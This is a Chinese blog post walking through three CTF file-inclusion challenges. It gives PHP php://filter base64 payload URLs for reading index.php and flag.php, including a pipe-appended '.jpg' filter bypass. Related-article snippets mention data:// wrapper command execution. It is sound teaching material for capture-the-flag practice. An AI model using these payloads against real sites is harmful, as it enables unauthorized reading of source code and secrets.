文件包含漏洞的三道题

最新推荐文章于 2024-06-20 20:30:56 发布
最新推荐文章于 2024-06-20 20:30:56 发布
阅读量1.9k 收藏 8
点赞数 1
分类专栏: # ——【 FileUpload/FileInclude】 ★ CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyw_666666/article/details/82390096
版权

ISCC2018你能绕过吗

在index.php后加f参数的内容发现会报错,猜测是文件包含漏洞

这里写图片描述
用php伪协议来读取flag.
经过测试发现题目过滤了php
所以构造

php://filter/convert.base64-encode/resource=index.php

解码读到flag
最后Base64解码即可


flag在index里

这里写图片描述

点下链接http://120.24.86.145:8005/post/index.php?file=show.php
发现File参数 易想到文件包含漏洞
构造payload:

http://120.24.86.145:8005/post/index.php?file=php://filter/convert.base64-encode/resource=index.php

Base64解码


图片型文件包含漏洞

这里写图片描述
url构造/show.php?img=1.jpg
要得到flag需要找flag.php
但少了.jpg文件提示File not found!
可利用resource包含两个文件绕过

/show.php?img=php://filter/read=convert.base64-encode/resource=flag.php|1.jpg

在源代码发现了show.php的内容

烟敛寒林o
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF---Web---文件包含---05---base64+路径
qq_22160557的博客
07-28 873
文章目录前言一、目描述二、解步骤1、御剑扫描2、查看源码3、判断后缀4、路径构造5、base64解码三、总结 前言 目分类: CTF—Web—文件包含—05—base64+路径 一、目描述 目: 172.16.15.186/stage/8/ 文件包含 二、解步骤 1、御剑扫描 Step1:御剑扫描,得到robots.txt文件,既而得到ge_t_key.php 2、查看源码 直接去访问172.16.15.186/stage/8/ge_t_key.php,发现内容为空,因为源码中没有echo
文件包含练习1
qq_61109509的博客
02-07 974
大佬文章
ctfshow web入门 目记录(简单的文件包含)
pwfortune的博客
12-26 384
意味着将php过滤了,所以需要绕过,可以使用date伪协议,用base64将<?过滤了很多,直接用date伪协议,base64编码绕过,使用命令执行得到flag (目过滤了=号,base64编码后需要将=去掉,=不影响编码结果) <?可以发现已经被执行了,所以再使用命令执行的方法,查看一下目录 <?可以查看到当下文件的目录,在读取flag文件,1=system("tac fl0g.php");直接利用伪协议,读取flag文件得到flag, 然后再进行base64解码得到flag。
CTF中文件包含漏洞总结
最新发布
qq_64395221的博客
06-20 1064
通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。
文件包含总结
weixin_48427966的博客
04-24 699
>、空格、汉字 等字符不符合base64编码的字符范围将被忽略,所以最终被解码出来的的字符就变成 “phpdie” 和 我们传入的$content的值。发现过滤的还是比较多,但是没有过滤: ,那我们就可以使用PHP伪协议就是 这里使用的是 data://text/plain;众所周知,base64编码中只包含64个可打印字符,而PHP在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。3、将php和data替换为?4、将php和data替换为?
WEB:目名称-文件包含
sleepywin的博客
07-19 549
用 bp爆破,暴力破解 intruder 模块有个“cluster bomb” (集束炸弹)模式,可以把上面所有的 16 个字符集格式做一个笛卡尔积,生成 256(16 *16)个请求。",可以推测 "base64" 字符串在黑名单里。,比如 iconv("ASCII", "UTF-8", $string),也就是说。convert.iconv 相当于用了 iconv() 函数,这个函数是。,拿到数据之后,再把它的字符集转回来就行了。构造payload尝试读取flag.php。爆破完成后可发现flag。
【从0开始学web】78-88 文件包含
yzl_007的博客
10-14 3521
【从0开始学web】78-88 文件包含 文件包含,可以先了解一下文件包含漏洞 https://blog.csdn.net/yzl_007/article/details/120261435 web78 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 10:52:43 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 10:54:2
第七式 七伤拳 web安全之文件包含漏洞.pdf
06-22
tsrc线上培训资料 第七式 七伤拳 web安全之文件包含漏洞
计算机三级网络技术库.doc
12-01
这道考察了点-点式网络的基本概念和特点。点-点式网络是一种基本的网络结构,将多个结点连接起来,实现数据的传输和通信。在点-点式网络中,一条通信线路只能连接两个结点,如果两个结点之间没有直接连接的线路,...
SICTF 2023 真
09-10
10. **W1-[签到]Include**:与C1类似,可能是Web安全领域的一个签到目,"Include"可能与服务器端的文件包含漏洞有关。 通过对这些文件名的分析,我们可以看出SICTF 2023的挑战涵盖了Web安全、密码学、逆向工程、...
关于往年护网笔试库收集
04-11
`/etc/group`文件包含了系统中所有组的信息,每一行代表一个组,格式为:`group_name:password:GID:member_list`。其中`GID`是组ID,`member_list`是属于该组的用户列表。 #### 4. 查看Windows Server 2008 IP地址...
Imaginary CTF 2022 真
08-01
参赛者需要熟悉HTTP协议、Web应用程序架构以及常见的漏洞,如SQL注入、跨站脚本(XSS)、文件包含漏洞等。挑战可能要求参赛者找到并利用网站的漏洞以获取敏感信息或控制服务器。 4. **权限提升(Pwn)**:这一类...
CTF_Web:文件包含与php伪协议
AFCC_的博客(Web_Dog)
08-11 2795
前言 在CTF目中文件包含和伪协议使用也是常见的一类目,常见的主要使用include()、require()等函数与其搭配产生可利用的漏洞或命令执行。 0x01 什么是文件包含 在开发的过程中,开发人员为了更好地使用代码的重用性,不重复的去编写一部分函数,从而引入了文件包含函数,通过文件包含函数将文件包含进来,使用包含文件的代码,降低开发的代码工作量,在同一个文件里面可以包含另外一个或多个文件进而使用他们内部定义的函数。 0x02 文件包含漏洞文件包含的过程中,如果没有对可包含的文件类型、用户可控的
CTFHub | 文件包含
尼泊罗河伯的博客
05-16 1205
简单分析网页显示内容中的源代码,可以发现一处代码include $_GET["file"] ,其中 include 语句可以动态地包含用户发送的GET 请求。详细的方法将在后续的内容中进行逐步解释。
文件包含漏洞学习,面试总结+详细解答
2401_83974020的博客
04-14 1038
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
文件包含漏洞详解
热门推荐
m0_55854679的博客
03-12 1万+
文章目录File Inclusion(文件包含)概述漏洞产生原因漏洞特点注小知识文件包含函数includerequireinclude_oncerequire_once文件包含示例pikachu靶场本地文件包含漏洞演示pikachu靶场远程文件包含漏洞演示文件包含漏洞的利用PHP伪协议(文件包含漏洞常用的利用方法)文件包含漏洞的防范措施phpMyadmin靶场练习 File Inclusion(文件包含)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件
i春秋CTF训练 Web include
椰奶冻不安全的博客
06-30 1221
Web include 目内容:没错!就是文件包含漏洞。 链接需到ichunqiu网站申请 页面显示出了phpinfo.php的信息以及php源码 <?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); }else{ include('phpinfo.php'); } 发现可以直接对path进行利用,构造path=php://input,同时post : &
java代码审计文件包含_代码审计--一道简单的文件包含目的多种利用方式
weixin_28689507的博客
03-02 579
不知出自哪次CTF前言:本萌新最近在学习代码审计,有一天在水群聊到代码审计如何学习,然后某dalao丢给我一道,说你对这有什么看法,本萌新一看,这不是很简单吗,想也没多想就直接上去?file=flag.php,然后被dalao指教了一番,于是就有了这篇文章。目录:NO.1 传统方法首先来看下代码error_reporting(0);if(@isset($_GET["file"])){inclu...
系统漏洞解析含flag
旺仔Sec&blog
02-24 5221
6. 通过本地 PC 中渗透测试平台 Kali 下载 flag.txt 文件,将文件中的 Flag。1. 通过本地 PC 中渗透测试平台 Kali 查看目标靶机共享的目录及 IP 地址白名。2. 通过本地 PC 中渗透测试平台 Kali 查看目标靶机共享的目录及 IP 地址白名。3. 通过本地 PC 中渗透测试平台 Kali 渗透进入目标靶机,将挂载目标靶机文。单(将 IP 地址替换为 0.0.0.0) ,将查看命令作为 Flag 提交;文件系统中该文件的位置,并将搜索所需命令作为 Flag 提交;
自制几道有关代码审计的选择
04-10
文件包含 D. 所有答案都正确 答案:D. 所有答案都正确 3. 代码审计是通过对程序代码的什么部分进行分析来检测漏洞的? A. 只分析核心模块 B. 只分析关键模块 C. 分析所有模块 D. 只分析用户界面 答案:C. 分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟敛寒林o

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值